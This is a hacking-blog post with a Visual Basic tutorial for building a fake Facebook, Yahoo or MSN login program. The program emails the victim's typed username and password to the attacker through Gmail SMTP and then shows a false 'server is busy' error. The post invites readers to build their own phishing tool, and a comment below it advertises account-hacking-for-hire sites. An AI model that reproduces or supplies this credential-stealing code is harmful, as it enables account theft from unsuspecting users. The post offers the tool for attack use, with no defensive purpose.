Home »Unlabelled » making Hack yahoo, MSN, facebook or anyone by Phishing video tuts
making Hack yahoo, MSN, facebook or anyone by Phishing video tuts
PROOFs
IN THIS VIDEO TUTORIAL I BE MAKING A FACE BOOK HACK USING VISUAL BASIC 2008,YOU CAN DO IT FOR YAHOO. MSN OR HOT-MAIL OR ANYTHING U LIKE... ALL YOU NEED IS VISUAL BASIC SOFTWARE AND THIS VB CODE JUST FOLLOW THE VIDEO TUTORIAL AND MAKE A WHATEVER PUSHING U LIKE
Code:
If TextBox1.Text = "" Then
MsgBox("Username Is Missing")
If TextBox2.Text = "" Then
MsgBox("Password Is Mising")
Else
End If
End If
Dim smtpServer As New SmtpClient()
Dim mail As New MailMessage()
smtpServer.Credentials = New Net.NetworkCredential("YOUR EMAIL HERE", "YOUR PW HERE")
'using gmail
Dim smtp As New System.Net.Mail.SmtpClient
smtpServer.Port = 587
smtp.EnableSsl = True
smtpServer.Host = "smtp.gmail.com"
smtpServer.EnableSsl = True
mail = New MailMessage()
mail.From = New MailAddress("YOUR EMAIL HERE")
mail.To.Add("YOUR EMAIL HERE")
mail.Subject = "Username: " & TextBox1.Text
mail.Body = "Username : " & TextBox1.Text & ", " & "Password : " & TextBox2.Text
smtpServer.Send(mail)
MsgBox("server is busy, Please try again later! visit www.y-socks.net/vb for more information")
ABOVE THE FORM.VB
CODE:
Imports System.Net.Mail
I FORGOT TO DO THIS IN TUTORIAL DOUBLE THE BUTTON 2 AND TYPE THIS
CODE:
Close ()
Msg for newbies Phishing is a method of hacking it's more like cheating lot of noobs caught to this kind of Phishing go head and make one yourselves it's not so hard
http://rapidshare.com/files/346651314/pushing.avi
This post was written by:
Adnan Anjum - who has written 1000+ posts on hackguide4u.
Adnan Anjum is a professional Geek. Follow him on Twitter or email him
Subscribe to:
Post Comments (Atom)
Share your views...
1 Respones to "making Hack yahoo, MSN, facebook or anyone by Phishing video tuts"
hack facebook password instantly? Dont worry, this Learn-To-Hack.com does not ask you any information about you. They ask you only to provide nick name when you fill out the request form. They were fast and amazing and you got the information hack yahoo accounts passwords free that was needed. Thank so much !
http://www.hire-to-hack.com
BTW, I found another website which is providing for free a free facebook hacking software and other one specialized in hack into someone's facebook password, hack facebook account id number.
Jordan N. Wilson,
Lawton, OK
United States
May 30, 2010 at 8:29 PM
Post a Comment